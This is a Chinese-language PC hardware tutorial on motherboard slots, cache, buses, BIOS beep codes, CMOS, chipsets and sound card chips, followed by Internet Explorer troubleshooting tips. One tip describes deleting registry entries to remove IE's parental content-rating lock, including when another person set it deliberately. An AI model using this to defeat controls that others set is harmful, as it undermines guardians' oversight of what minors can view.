3、AMR（声音／调制解调器插卡）：在Intel 810芯片组或VIA的MVP4、Apollo Pro Plus 133芯片组的主板上可以发现一个很短的新型插槽，长度约为5厘米，这就是AMR插槽。AMR作为AC'97规格的一部分，提供了一套全开放的工业标准，规定了AMR扩展卡可以同时支持声音及MODEM功能。采用这种设计，系统厂商可通过一个开放的、工业标准设计的插卡，用极低的成本在主板上实现音效和MODEM功能。

4、AGP（加速图形端口）：1996年Intel公司在PCI的基础上专为显示卡接口提出AGP标准。AGP槽是主板上的一条咖啡色的插槽。AGP使用32位数据总线，工作频率为66.6MHz，AGP 1×的数据传输率可达266MB／s，AGP 2×在一个时钟周期的上升沿和下降沿各传输一次资料，其数据传输率可达到533MB／s，而AGP 4×的理论传输率为1.066GB／s。 AGP有如此高的带宽，使得显示卡与主存储器之间能直接进行数据传输，即所谓的DIME（直接内存执行）。

5、USB：USB是以Intel为主并有Compaq、MicroSoft、IBM、DEC、NEC、Northern Telecom7家公司共同制定的串行接口规格。现用的USB接口普遍采用的是USB 1.1规范。USB接口适用于低、中速的外围设备如键盘、鼠标、打印机、数码相机、调制解调器、扫描仪等。去年10月公布了USB 2.0新规范的草案,将最高传输速率提高到480Mbps，正式版本也呼之欲出。

6、IEEE1394：IEEE1394是1995年由IEEE将APPLE公司高速串行总线“FIRE WIRE”标准化而成，目前还在发展中。标准数据传输率分三种：100Mbps、200Mbps和400Mbps,IEEE1394商业联盟计划将它提高到800Mbps、1Gbps和1.6Gbps；　　IEEE1394适用于声音、图像和视频多媒体产品、高速打印机和扫描仪产品、硬盘等存储设备、数码摄影机、显示器和影音录放设备等。

三、内存插槽

目前主板上用来固定内存条的槽主要有两种，最新型的叫DIMM槽。现在能够看到的SIMM槽都是72线的，通常是4个。SIMM槽的两端有弹簧片，起到固定内存条的作用。安装SIMM内存很容易，在内存条的一端有嵌口，所以只能以正确的方式安装，把它倾斜着放进槽口，然后推到正确的位置，两端的弹簧夹子就会把它锁住。要拆除SIMM条，必须按下两边的卡簧。

第三节、缓存

    所谓缓存(Cache)就是高速缓冲存储器，它位于CPU与主存(即DRAM动态存储器)之间，通常由SRAM(静态存储器)构成，它的容量较小但存取速度较快。目前计算机主要使用的内存为DRAM，它具有造价低、容量大的特点，受到广泛欢迎。但由于DRAM是使用电容特性来储存信息，存取速度难以进一步提高，而CPU每执行一条指令都要一次或多次访问主存，DRAM的速度又远小于CPU速度，因此为了实现速度上的匹配，只能在CPU指令周期中插入等待，这样将大大降低系统的执行效率。SRAM由于采用了与CPU同样的制作工艺，因此与DRAM相比，它的存取速度要快得多。但其体积大、功耗大、价格也高，不可能也不必要将所有内存都换成SRAM，因此，为了解决速度与成本的矛盾就产生了一种分级处理方法，即在主存与CPU之间加装一个容量较小的SRAM作为高速缓冲存储器，当使用缓存时，在缓存中就保存有主存部分内容的副本(即为存储器映像)，CPU在读写数据时，首先访问缓存，由于缓存速度与CPU速度相当，所以CPU可以在零等待下完成指令执行，只有当缓存中没有CPU所需的数据时(这时称为“未命中”)，CPU才去访问主存。CPU访问缓存的命中率在80％以上，从而大大提高了CPU访问数据的速度，提高了系统性能。

    传统的Socket架构通常采用两级缓冲结构，即在CPU中集成一级缓存(L1 Cache)，在主板上装第二级缓存(L2 Cache)，而Slot 1架构的L2 Cache则与CPU做在同一块电路板上，以内核速度(CPU速度)或内核速度一半运行，速度比Socket架构的L2 Cache更快，能更大限度地发挥与高速CPU配合的优势，当然这对Cache的工艺要求也较高。CPU在执行指令时，首先在L1缓存中查找数据，如找不到，则在L2缓存中找，如找到则传输给CPU同时修改L1缓存的数据，若数据不在L1和L2缓存中，则从主存中提取数据同时修改两级缓存的数据。由此可见，缓存相当于一个临时的快速运输器、搬运工，它对于系统的运作有不可忽视的作用，所以选择有缓存和大容量缓存的CPU可提高我们计算机的工作效率，当然,价格也会很高。

第四节、总线

众所周知，微型计算机系统是一个信息处理系统，各部件之间存在大量的信息流动，所有信号都要通过通信线路传送，所以通信线的设置和连接方式是十分重要的。所谓总线，就是指能为多个功能部件服务的一组信息传输线，它是计算机中系统与系统之间或者各部件之间进行信息传送的公共通路。主板总线的种类：

一、ISA总线：工业标准体系结构总线（Industrial Standard Architecture Bus）。

二、PCI总线：外设部件互连总线（Peripheral Component Interconnection Bus）。是由Intel、IBM、DEC公司所制订的，PCI Bus与CPU中间经过一个桥接器（Bridge）电路，不直接与CPU相连的总线，故稳定性和匹配性较佳，提升了CPU的工作效率，扩展槽可达三个以上，为32bit／64bit的总线，是目前主板及外围设备使用的标准接口。

三、AGP总线：加速图形端口（Accelerated Graphics Port），其最主要的结构是在使用AGP芯片的显示卡与主存之间建立专用通道，让影像和图形数据直接传送到显示卡而不需要经过PCI总线。AGP总线为32bit数据和66MHz频宽的总线，速度比PCI快，为PCI总线的4倍，是在Pentium Ⅲ CPU和真正32位的Windows 操作系统环境之下一展身手，发挥其功能的主要结构。

四、USB总线：通用串行总线（Universal Serial Bus）。USB总线规格的制订是由Intel、Microsoft等领导世界电脑硬件和软件的大公司所主导，解决各种外围设备接头不统一的问题，可接127个外围设备的标准接口。

第五节、接口

    大家都知道，计算机单有中央处理器（CPU）是不能工作的，它需要键盘，显示器的各种输入输出设备与它一起配合工作。同样，用PC机进行数据采集和自动控制也需要借助于各种计算机外部设备的支持。然而，各种外部设备种类繁多，信息的类型和编码格式各不相同，传送速度也有快有慢，所以中央处理器与各种外部设备之间的“桥梁”便是接口电路。接口电路对通过它的数据起一个缓冲的作用，从而达到数据互相匹配的效果。下面以典型的ATX主板为例来介绍这些接口。

一、PS／2接口：用来连接键盘和鼠标。

二、IRDA红外传输接口：近年来便携设备的发展很快，笔记本电脑，数码相机等都具有红外传输接口。一般较新型的台式机的主板上都保留有此接口，只需增加少量的外围元件便可实现红外传输功能。此接口一般为单排的五针插座。

三、COM1、COM2串行异步通讯接口：普遍采用的标准是美国电子工业学会在1969年颁布的RS－232－C标准，规定共有25根信号线，但在一般的使用和通讯中，只有9根线经常使用，随着ATX主板的普及，25针接口已很少使用。典型的9针接口定义。说明：有关电流环的引脚9、11、18、25是用于驱动电传打字机等设备工作的，利用引线中有无20mA电流作为逻辑1和0的标志。使用电流环工作方式时的传输距离一般可以达到2000米，是采用电压传输方式的几十甚至上百倍。

四、LPT并行通讯接口：目前微型计算机上常用的并行接口标准是Centronics接口，该接口使用36个引脚的Amphenol57系列接头，但在计算机LPT端口则使用的是25个引脚的DB－25接头，将原来的36根线号线省去了很多电源及接地线，减少到25根。

    随着科技的进步，并行口家族不只包含有标准并行口SPP，而且还诞生了EPP（增强并行口）和ECP口（扩展并行口）。它们采用的是一个接口，但可以选择不同的通讯协议，EPP和ECP支持更快的速度和更多的功能。

第六节、BIOS

一、BIOS基本概念

    BIOS（Basic Input ／ Output System)——基本输入输出系统，通常是固化在只读存储器（ROM）中，所以又称为ROM－BIOS。它直接对计算机系统中的输入输出设备进行设备级、硬件级的控制，是连接软件程序和硬件设备之间的枢纽。ROM－BIOS是计算机系统中用来提供最低级、最直接的硬件控制的程序。计算机技术发展到今天，出现了各种各样新技术，许多技术的软件部分是借助于BIOS来管理实现的。如PnP技术（Plug and Play—即插即用技术），就是在BIOS中加上PnP模块实现的。又如热插拔技术，也是由系统BIOS将热插拔信息传送给BIOS中的配置管理程序，并由该程序进行重新配置（如：中断、DMA通道等分配）。事实上热插拔技术也属于PnP技术。

二、BIOS响铃代码的含义

    当电脑出现毛病不能启动时，机器的带电自检程序POST会从PC喇叭发出一些提示信息，让您找出发生故障的部件。因而，掌握电脑所发出声音的含义对于解决各种问题是很有帮助的，下面就按照不同公司的BIOS简单介绍一下响铃代码的含义。

1、Award BIOS

1短 　　系统正常启动

2短 　　常规错误，请进入CMOS SETUP重新设置不正确的选项

1长1短　 　内存或主板出错

1长2短 　　显示错误（显示器或显示卡）

1长3短 　　键盘控制器错误

1长9短 　　主板FlashRAM或EPROM错误（BIOS损坏）

不断地响（长声）　 内存未插稳或损坏

不停地响 　　显示器未和显示卡连接好

重复短响 　　电源问题

无声音无显示 　　电源问题

2、AMI BIOS

1短 内存刷新失败

2短 内存ECC校验错误

3短 系统基本内存（第1个64K）检查失败

4短 系统时钟出错

5短 中央处理器（CPU）错误

6短 键盘控制器错误

7短 系统实模式错误，不能切换到保护模式

8短 显示内存错误（显示内存可能坏了）

9短 ROM BIOS检验和错误

1长3短 内存错误（内存损坏，请更换）

1长8短 显示测试错误（显示器数据线松了或显示卡插不稳）

3、Phoenix BIOS

1短 系统正常启动

3短 系统加电自检初始化（POST）失败

1短1短2短 主板错误（主板损坏，请更换）

1短1短3短 主板电池没电或CMOS损坏

1短1短4短 ROM BIOS校验出错

1短2短1短 系统实时时钟有问题

1短2短2短 DMA通道初始化失败

1短2短3短 DMA通道页寄存器出错

1短3短1短 内存通道刷新错误（问题范围为所有的内存）

1短3短2短 基本内存出错（内存损坏或RAS设置错误）

1短3短3短 基本内存错误（很可能是DIMM0槽上的内存损坏）

1短4短1短 基本内存某一地址出错

1短4短2短 系统基本内存（第1个64K）有奇偶校验错误

1短4短3短 EISA总线时序器错误

1短4短4短 EISA NMI口错误

2短1短1短 系统基本内存（第1个64K）检查失败

3短1短1短 第1个DMA控制器或寄存器出错

3短1短2短 第2个DMA控制器或寄存器出错

3短1短3短 主中断处理寄存器错误

3短1短4短 副中断处理寄存器错误

3短2短4短 键盘时钟有问题，在CMOS中重新设置成Not Installed来跳过POST

3短3短4短 显示卡RAM出错或无RAM，不属于致命错误

3短4短2短 显示器数据线松了或显示卡插不稳或显示卡损坏

3短4短3短 未发现显示卡的ROM BIOS

4短2短1短 系统实时时钟错误

4短2短2短 系统启动错误，CMOS设置不当或BIOS损坏

4短2短3短 键盘控制器（8042）中的Gate A20开关有错，BIOS不能切换到保护模式。

4短2短4短 保护模式中断错误

4短3短1短 内存错误（内存损坏或RAS设置错误）

4短3短3短 系统第二时钟错误

4短3短4短 实时时钟错误

4短4短1短 串行口（COM口、鼠标口）故障

4短4短2短 并行口（LPT口、打印口）错误

第七节、CMOS

系统设置或配置信息存储在CMOS RAM(或CMOS SRAM)中，它叫做互补金属氧化物半导体存储器，属于内存的一种，它需要很少的电源来维持所存储的信息。时钟(RTC)记录系统的日期和时间，也需要电源来维持，所以，一些主板上都能看到一块金属的锂电池来提供电源。电池寿命大约是5年，当你发现电脑的时间变慢或者不正确时就要准备更换电池了。

    CMOS记录了系统的一些重要信息，如软驱、硬盘的设置以及系统日期和时间等，电脑每次启动时都要先读取里面的信息。某些情况会引起CMOS内容的丢失，比如电池电量不足，或者其他一些不可知的原因。

    有时我们需要主动清除CMOS中的信息，比如忘记了开机密码而无法启动系统。一般，主板上有专门的跳线来解决这个问题。有些主板的电池不容易取下，你要参考主板说明书，找到正确的跳线，按指示的方法进行；一般的方法是先关闭电源，把CMOS跳线短接一会儿，然后还原，重新开机即可。

第八节、控制芯片

主控制芯片:主板上还有两个重要的控制芯片，一块PCI插槽旁边，另一个在CPU旁边；它们是控制局部总线和内存的，各种扩展卡都由它们来控制；也就是说CPU对其它设备的控制都是通过它们来完成的。它们的型号往往决定了主板的扩展性。

    我们在购买主板时，常常看到包装上、广告上会写着什么BX芯片组，MVP芯片组，等等，这些芯片组就是指这两颗控制芯片，它们决定了主板所支持的CPU类型、最高的工作频率、内存的最大容量、扩展槽的数量等等。所以购买主板时，要注意芯片组的类型。

    外围设备控制芯片:上面介绍了主要控制芯片，主板上还有一颗控制外部接口的芯片：MULTII/O。它主要控制并口、串口、键盘、鼠标、还有软盘驱动器的接口。ATX结构的主板，这些接口都集成在主板上，AT结构的主板就只有一个大的键盘口，串并口要从主板上用数据线接出来。

第九节、主板芯片组

个人计算机（Personal Computer，简称PC）从20世纪中叶发展到现在，功能越来越强大，结构越来越简单，这不能不归功于个人计算机主板上重要的部件——芯片组。

    芯片组号称是主板的灵魂和核心，芯片组性能的优劣，决定了主板性能的好坏与级别的高低。这是因为目前CPU的型号与种类繁多、功能特点不一，芯片组若不能与CPU良好地协同工作，将严重地影响计算机的整体性能甚至不能正常工作。其中由芯片组决定的重要性能有：CPU的类型、主板的系统总线频率（即通常所说的CPU外频）、倍频系数、扩展槽的种类与数量、AGP显示接口的速度（1×，2×，4×或更高）等等。还有些芯片组由于纳入了3D加速显示、AC'97声音解码等功能，还决定着计算机系统的显示性能和音频播放性能等。

    现在的芯片组，是由过去286时代的所谓超大规模集成电路：门阵列控制芯片演变而来的。到目前为止，能够生产芯片组的厂家无非就是Intel（美国）、VIA（中国台湾）、SiS（中国台湾）、ALi（中国台湾）、AMD（美国）几家，其中以Intel和VIA的芯片组最为常见。

一、Intel

    Intel从Pentium时代起就提供了性能优越的芯片组系列，其型号最为齐全，也最为复杂。其中支持Pentium系列的芯片组有430FX、430VX、430HX、430TX系列，支持PⅡ系列的芯片组有440FX/LX/BX/GX/EX/ZX等，最近又推出了i810和i820芯片组。

    440FX主要面向Pentium Pro CPU，440LX则是专门针对PⅡ CPU设计的芯片，并支持AGP显示接口、SDRAM内存、Ultra DMA/33等功能。

    而目前应用最广泛的是440BX芯片组了。该芯片组北桥采用82443BX，南桥采用82371AB，与440LX相比，最大的特点就是支持PC100总线标准，并支持AGP 2×接口，内存可扩展到1GB。实际上用此芯片组设计和制作良好的主板，外频号称可上至133MHz，CPU则完全支持最新的PⅡ至PⅢ全系列。此芯片组也创造了Intel的芯片组中使用寿命最长的纪录。

    440GX可以说是440BX的增强版，主要应用于服务器领域，北桥采用82443GX，南桥采用82371EB。与440BX相比，该芯片支持PentiumⅡ Xeon(至强)CPU，并支持双CPU以SMP模式工作，内存最高可上到2GB。

    440EX是Intel专为其简化版本的PⅡCPU——Celeron(赛扬)量身定做的芯片组。北桥采用82443EX，南桥采用82371AB，外频只支持66MHz。但应用该芯片组的主板不是很多，很快就被随后推出的440ZX挤出市场，大概算得上Intel的芯片组中最短命的产品了。

    440ZX是Intel为支持Socket 370结构的Celeron而专门设计的一款芯片组。该芯片组支持100MHz外频，2个DIMM插槽，3个PCI和1个ISA插槽，采用该芯片组的主板有的还集成了i740图形加速显示芯片。

    i810芯片组是Intel全面投入低价整合型电脑的标志性产品，于1999年4月推出。由三块芯片组成：GMCH、ICH、FWH。主要特点是采用了i752图形加速显示芯片，其速度比一般AGP 2×要快一些，支持Ultra DMA/66，在GMCH和ICH之间采用专门设计的专用总线结构，数据传输率大约为普通PCI总线的2倍，并支持AC'97规范。

    i820芯片组是Intel刚刚推出的基于440BX的换代产品。也由三块芯片组成，分别为82820（MCH）、82801（ICH）和82802（FWH）。其特点是：支持PC133标准外频，支持工作频率高达400MHz的Direct Rambus内存，支持AGP 4×标准，最高传输速率达1.066GB/s，支持Ultra DMA/66规格，支持AC'97标准。

二、 VIA

    VIA是一家以生产主板芯片组为主的高科技企业，去年收购了美国国家半导体（NS）旗下的Cyrix X86微处理器事业部更是名声大噪。从Pentium时代的VP1，VP2，VP3，MVP3，MVP4，到PⅡ时代的Apollo pro 133，Apollo pro 133A，直至支持K7的Apollo KX133，VIA一直紧跟时代潮流。

    MVP3是比较成功的芯片组。该芯片组北桥采用VT82C598（VT82C598AT），南桥采用VT82C596B。其中，VT82C598采用ATX结构，VT82C598AT采用Baby AT结构。该芯片组真正支持100MHz外频，正是它的应用才使Socket 7结构的市场常盛不衰，并发展为后来的Super 7结构。支持内存达1GB，二级Cache可支持到2MB也是它的特色，该芯片组还对K6－2 CPU和AGP接口专门做了优化，使得MVP3＋K6－2的配套销售红极一时。

    VIA还是最早推行PC133规格的厂商，其Apollo pro 133、Apollo pro 133A都支持133MHz外频。其中Apollo pro 133使用了VT82C693A做北桥芯片，支持AGP 2×显示接口，Apollo pro 133A是Apollo pro 133的改进型，使用VT82C694X做北桥，支持VCM内存、AGP 4×接口。而Apollo KX133是VIA与AMD合作开发的支持AMD K7（Athlon）的芯片组，其北桥芯片是VT8317，南桥是VT82C686A，支持AGP 4×，PCI2.2，Ultra DMA33/66，2GB的同步内存和4组USB。该芯片组是基于K7 CPU的面向高端个人用户及服务器领域的产品，它比以前的任何一款芯片组提供了更加良好的兼容性以支持AGP 4×接口、200MHz外频和ATA/66硬盘接口，从而大幅度提升了目前PC的性能。VIA还与Trident合作开发了VIA ProMedia芯片组，该芯片组支持133MHz外频，Socket 370结构，内置显示卡、声卡、电视卡，面向低端家庭应用。

三、 AMD

    提起大名鼎鼎的AMD，相信是无人不知、无人不晓。AMD凭借去年下半年发布的K7微处理器在整数、浮点和3D诸方面的优异性能，全面超越Intel的PⅢ，从而一炮打响，成为PC界第一个在Intel制定的业界标准面前敢说“不”字的“叛逆者”，由此也诞生了AMD－750芯片组。AMD－750芯片组由AMD－751北桥和AMD－756南桥芯片构成，采用0.35微米制造工艺，能够在K7所支持的200MHz的EV6总线上提供1.6GB/s的带宽，这要比100MHz或133MHz的系统总线速度快50％～100％。该芯片组支持AGP 2×，PC100 SDRAM，ECC内存，Ultra ATA/66，4个USB接口和PCI2.2规范。

    不过似乎AMD无意进入芯片组领域，到目前为止它生产的AMD－750芯片组，仍然只是少量地提供给一些厂家，进行试验和模拟开发，支持K7 CPU的兼容芯片组之用。

四、 SiS

    SiS是我国台湾的一家高科技企业，以生产整合型主板控制芯片组而闻名。从早期的SiS5598芯片组，到集成了SiS6326的SiS530和SiS620，直到目前的SiS630芯片组，一直以整合芯片组占据了PC市场低端应用的半壁江山。最新SiS630芯片组用于Slot 1接口的PⅡ和PⅢ系列主板，其显著特点是把北桥的逻辑芯片、南桥芯片以及SiS300显示芯片整合到一起，并同时包含了Modem、HomePNA、网卡、DVD硬解压及3D立体声解码等功能，显示部分采用了专利的Ultra－AGP结构，支持最高达32MB的SDRAM或VCM显存。体积小、成本低是它的特点。

五、 ALI

从486时代，ALI就以整合主板芯片组而著名于世。Pentium时代的代表作为AladdinⅣ，此芯片组又被称为TX pro，功能与Intel的TX芯片组相似，但价格比它便宜。Super 7时代的代表作是AladdinⅤ，该芯片组支持100MHz外频、AGP 2×接口，与AMD K6－2 CPU配合使用的性能良好。目前正在开发的ALi Aladdin Pro Ⅲ将是一款值得关注的、集成了支持最新PC133内存、ATA/66硬盘接口、强劲的3D显示功能以及硬件波表合成的声音控制芯片的芯片组。

第五章、声卡基础知识

    声卡在计算机中已经不是仅仅扮演一种模拟信号的输入和输出的角色了。越来越强大的声卡芯片正在不断地为我们提供越来越真实的声音效果和震撼的环绕音效。没有了声卡的“芯”，也就没有了我们今天的MIDI、MP3以及游戏中那动人心魄的音响效果。毫不夸张地说，音频处理芯片的好坏直接影响整块声卡的表现能力。现在，就让我们从“芯”说起吧！

   首先音频处理芯片承担着声音处理所需的大部分运算，包括对声音信号的回放、采样、录制等，比如控制CD、Microphone、MIDI和Line－In等音源的回放音量与左右声道平衡、控制录音音量、进行混合录音或放音等。

   再者，随着PC环绕声（如最新流行的EAX与A3D）的出现及人们对其他特殊效果（如回声）的要求，音频芯片承担了所有的硬件加速处理，从而减轻CPU的负担，提高系统整体性能；另外，音频处理芯片还在不同程度上提供了MIDI波表合成能力以及软件兼容。

   要想简明扼要地说清市面上的各种声卡音频处理芯片的话，我想不得不从“声卡霸主”——Creative说起。我们就先说说创新从高端到低档各种主力芯片吧！

一、创新公司(Creative)系列芯片

   1、MU10K1芯片：SB Live！系列声卡的核心就是EMU 10K1芯片，也是目前创新最“豪华”的声卡芯片了，该芯片甚至能达到一枚普通Pentium处理器的运算能力。它支持64个硬件MIDI复音和1024个软件复音，具有很不错的音频信号品质，从某种意义上说它已经不是一般的音效芯片，而具备了一定的专业水准，还具有相当不错的三维音效。由于它的可编程特性，所以可以通过升级软件进行升级从而达到提高性能的目的，通过类似于下载样本（DLS：Down Loadable Sample）的音乐库（SoundFont）技术，可共享32MB的系统内存，从而保证了在将来新的音频技术面前仍能保持顽强的生命力。 但其MIDI合成能力不如一些好的软波表。

   2、Creative ES1370、ES1371、ES1373芯片：32个硬件复音，其中PCI64与PCI128可以通过相应的软波表扩充到64与128复音，支持Direct Sound与Direct Sound 3D，能通过软件升级方式支持EAX，不过只是兼容了EAX的3D环绕部分，不能支持4声道，其实质上是通过软件模拟来产生4声道输出效果。很奇怪的是ES1370的驱动程序不能用在ES1371上，而ES1373芯片则主要用在主板集成，性能与ES1371相同。

    3.Creative 5507芯片：其性能和ES137X非常相似，只是Creative 5507已能真正支持4声道环绕输出，而ES1371则是通过软件模拟来产生4声道输出效果。

    其实，自从进入PCI声卡时代以后， 声卡音频处理芯片的竞争也越来越激烈。由于各种不同的API（应用程序接口）的存在（比如A3D、DirectSound3D、EAX 1.x／2.0），为了更好地支持某种API技术得到最佳的音效，从这方面来讲，实质上加速了各种不同声卡音频处理芯片的出现和竞争。今天的声卡音频处理芯片早已不是“独霸天下”的局面了，主要的声卡音频处理芯片还有：

二、雅马哈公司（Yamaha）系列芯片

    YAMAHA目前主要有724E、740和744三个系列，主要面向中低档市场。

    1.YMF－724E和YMF－740：兼容FM发音模式，192个复音（其中64个硬件复音和128个由性能优秀的软波表生成的软件复音），此外它还采用了Sensaura 3D音效演算方法用于Direct Sound 3D，原理类似于A3D，具有HRTF功能，实际效果也不错，不次于A3D 1.0。在I／O方面，YMF724E 还支持索尼／飞利浦数字交换格式接口，可直接输出数字音频信号。美中不足的是该芯片在DOS兼容性方面较差。目前市面上除了雅马哈的Waveforce 192XG外，还有昆盈（Qenius）的Sound Maker 128XG 和中凌（A－Trend）的3DS724A，花王SV550也是使用的该芯片。

    2.YMF－744：YMF－744芯片基于前一代——724产品，具有优异的MIDI合成能力。和724相比，改进较大的地方是744芯片加入了趋于流行的4声道和DVD软件支持，三维环绕效果有较大提高。目前YAMAHA XG－Movie 5.1、启亨呛红辣椒64 4.1和花王的SV1500都是采用的这种芯片。

三、Aureal Semiconductor公司系列芯片

    1.Vortex AU8820：即Vortex－1：帝盟的Sonic Impact S90和Monster Sound M80是该芯片的最有力支持者。它是第一款真正支持A3D 1.0标准的声卡芯片。主要特点就是完全支持AS公司所开发的A3D 1.0标准，同时具有64个硬件复音并支持DLS，最多可使用4MB的RAM来存储波表样本。芯片本身的信噪比高于90dB，如果配合相应软件，它还可以进行Dolby Digital（AC－3）解码操作。另外，AS公司还在AU8820中加入了新的Sound Blaster／Pro模拟技术，可有效支持DOS环境。而且AU8820还支持MPU－401，可以连接使用ISA总线的Modem进行功能扩展，在必要的时候还可以外接摩托罗拉公司（Motorola）的56011 DSP芯片来加快解码速度。

    2.Vortex－2 (AU8830)：目前帝盟的Monster Sound MX300、 Turtle Beach的MontegoⅡ 和Xited的Storm Platinum使用该芯片。它是Aureal公司继Vortex－1推出的新产品，也是唯一可与EMU－10K1芯片相媲美的产品。AU8830完全支持A3D 2.0规范，亦即支持用4声道来表现三维音效，加入了声波追踪技术，以便获得更多的声音变化体验，具有堪称一流的WAVE处理能力。MIDI方面Vortex－2与Vortex－1使用相同的合成技术，效果基本无异。不过该芯片在处理各类声音时的CPU占用率要普遍高于其他产品。

四、ESS公司系列芯片

    1.Maestro－1（ES1948F）：这是ESS最早推出的PCI声卡芯片， 采用了DLS技术，提供了一个64复音的波表合成器，这较当时广为流行的FM合成要动听许多。在三维音效上它采用Spatializar 3D技术，可以提供硬件加速Direct Sound和Direct Sound 3D的功能，该芯片最主要的特点是兼容性较好，软件支持A3D 1.0标准，但效果不明显。基于该芯片的声卡市场上已不多见，产品主要有：华硕AXP－201、启亨的呛红辣椒64PCI 以及硕合的TeraSound 128。

    2.Maestro－2(ES1968S)芯片：Maestro－2与Maestro－1一样内建双声道引擎，具有64复音，可使用最多8MB的RAM保存波表样本，采用了32位线程处理技术和数据缓存技术（WaveCache），充分发挥了PCI总线大容量数据传输的优点，音质非常出色，信噪比达到85dB。提供了两路立体声音频输出的支持（一路SPK OUT、另一路LINE OUT），可以为用户营造一个模拟的环绕效果（大家不要误解成4声道）。Maestro－2还支持较新的ACAPI v1.1与APM v2.1能源管理规范，非常适用于笔记本电脑，但从总体上来看MIDI合成效果欠佳。目前帝盟的Sonic Impact S70、 启亨的呛红辣椒、A3D Pro 和华硕 APX－202 以及Aopen AW300都是采用的该芯片。

    3.Canyon3D芯片：这是ESS公司的最新力作，具有很强的数据处理能力。目前新众公司的Golden Melody Hi－five 和帝盟的Monster Sound MX400是采用的该芯片，它真正支持四声道，并单独提供了一个可独立控制的低音炮输出接口，可支持包括DS3D、A3D 1.0和EAX在内的多种主流API，在四声道模式下能够提供较好的环绕效果，音质不错，DOS兼容性也比较好， MIDI合成却没有多少本质的改进，而且它提供的音效变化是通过软件模拟的，并非通过芯片合成，这样反而有可能加重CPU的负担。

五、Cirrus Logic／Crystal Semiconductor公司的CS4280芯片：具有64个复音，支持最多2MB样本存储空间。此外它还内置了SRS环绕效果器，并通过了AC ’97、PC '97和PC '98的认证，支持FM合成、通过硬件调整音量以及APM能源管理，适合在笔记本电脑上使用。

六、Trident公司的4D Wave－DX／NX芯片：市面上的花王SV750、则灵天音1号采用的是4D Wave－DX芯片，AZTech公司的PCI288 Q3DII采用的是其4D Wave－NX 芯片。 DX芯片具有64个硬件复音，最高支持6MB波表样本容量，在3D环绕方面，使用QSound最新开发的3D效果器，支持HRTF的声音能量密度（IID：Interaural Intensity Density）与声音延时差异（ITD：Interaural Time Difference）演算、多普勒效应模拟与延迟，并可用软件模拟A3D。芯片本身信噪比达到90dB以上。4D Wave－NX芯片则在DX的基础上可以完全支持4音箱输出和S／PDIF输出以及支持创新的EAX环境音效， 该系列芯片最为明显的缺陷是DOS的兼容性不好。

七、骅讯电子（C－Media）的CMI－8338／8738芯片：该芯片可能是目前市面上低档声卡采用的主要芯片了，在尽可能的低价位上提供了比较强大的功能，采用该芯片的声卡一般都具有较为优秀的性价比。目前市面上的丽台4XSound和夜莺6400都采用了这款芯片。该芯片支持4声道输出，该芯片最引人注意的特点是同时提供SPDIF IN和SPDIF OUT，而且可以通过子卡支持光纤输入和输出，目前支持A3D 1.0和DS3D，但可通过升级驱动程序用软件来模拟EAX。该芯片主要缺陷是硬波表合成器效果差，在使用时一般都要另外安装软波表来弥补这一缺陷。8738是8338的改进版本，最主要的改进是增加了软猫的功能。其他性能并没有本质区别。

八、ForteMedia公司的FM801芯片：该芯片支持PCI v2.2（66MHz总线频率、64Bit带宽）、Bus Master控制功能以及高质量的音乐合成，为了能在DOS环境下工作，它还兼容SB Pro，支持64复音和最大5MB的波表样本容量，支持S／PDIF输出并集成QSound 3D环绕效果器。理论上信噪比高于85dB。采用此种芯片的声卡相对较少，主要是中宇公司的Phantom 806声卡。

    目前市面上还有S3 Sonic Vibes、VLSI Qsound Thunderbird 128等其他型号的音频处理芯片，一是使用较少，二是由于篇幅的原因，我在这里就不再介绍了。

  IE难缠故障排除手册

从上面专题的名称，大家一定也看出来了.这里我们介绍的不是一般的IE浏览器的操作技巧问题，因为这方面的文章似乎已经太多了。从更实用，对网友们更有利的角度上，笔者选择了“难缠故障”这个着眼点。之所以称之为“难缠”恰恰表现在它发生的频繁性和解决的困难度上。

希望大家顺着笔者的思路，在解决疑难的时候，同时对IE也能有一个更加深刻的认识。

1> 去除被设定了的“分级审查”

分级审查大家都知道了，它是一种定性的控制浏览器中显示内容的方法，举个例子，如果在网页内容中包含性描写之类的黄色信息，“分级审查”系统能够自动识别出来并提示当前用户，该内容被限制浏览，当然所限制的内容并非仅限于此。

也正因为此，分级审查设定不当的话，往往给用户带来很多不必要的麻烦，所以笔者在这里并不提倡大家使用分级审查的方法来屏蔽过滤网页。那么如何解除它呢？

如果是你自己设定的分级审查，就相对简单些了，直接在最下的“密码”输入框内键入密码即可开始浏览。同时你还可以通过“监护人”的身份将该功能关闭掉，以避免总是来回出现提示窗口。

使用菜单“工具”-“Internet选项”，选择“内容”选项卡

单击分级审查设定框内的“禁用”按钮，这时IE会要求你输入监护人的密码

“确定”后，IE会弹出一个提示窗口告诉你当前分级审查已经关闭，现在你可以随便浏览网站了。

但是很多情况下，往往我们不知道“监护人密码”，这也是它的棘手之处。不管是由于不小心忘记了， 还是别人故意设置的，这时想去除它就要借助“注册表”了。

单击“开始”菜单，选择“运行”，在里面键入命令“regedit”，进入注册表编辑器。按顺序依次选择“HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼Policies”，如图

鼠标右击“Ratings”键将其删除，退出注册表编辑器，同时进入系统目录（Windows/System）下，将相应的文件Ratings.pol也删除掉。然后重新启动计算机。

故障提示：为了防止别人随便设定分级审查，你可以在开启该功能后关闭，这样当用户再次设定时，将需要提供上次的原始密码，否则不能完成。

2> IE小窗口，如何让它重新变大？

有时在我们使用IE浏览器中，不知道什么原因窗口就变小了。每次重新启动时，都是这样一个小窗口，即便是用“最大化”按钮，还是无济于事。

其实这是IE自身所具有的一种“记忆”效应，即下次重新开启的窗口默认依从最前一次关闭时的状态。当然问题严重时，也会出现类似上面这种情况。

同样进入注册表编辑器，依次选择“HKEY_CURRENT_USER＼Software＼Microsoft＼Internet Explorer＼Main＼”，在右边的窗口中删除“Window_Placement”键，如图

另外在“HKEY_CURRENT_USER＼Software＼Microsoft＼Internet Explorer＼Desktop＼Old Work-Areas”右边窗口中删除“OldWorkAreaRects”键，如图

关闭注册表，重新启动计算机，连续两次最大化IE窗口（“最大化”-“还原”-“最大化”），再次重新启动IE OK了。

3> 如何永久性的固定“HomePage”地址？

上网浏览时，经常遇到本来已经设定好的“主页”地址被更改的情况，当然你可以再次通过“工具”-“Internet选项”中的“常规”选项卡设定回来，然而变来变去终究够麻烦的。

那么有没有更彻底的办法呢？这里用到了一个叫做“MS Internet Explorer personal”的IE浏览器扩展插件，IEP（简称）是一个IE的增强工具软件，主要是用来定制个性化的浏览器显示外观，并对IE的工具选项进行一定的限制。通过它你可以将浏览器的主页地址彻底“锁死”！

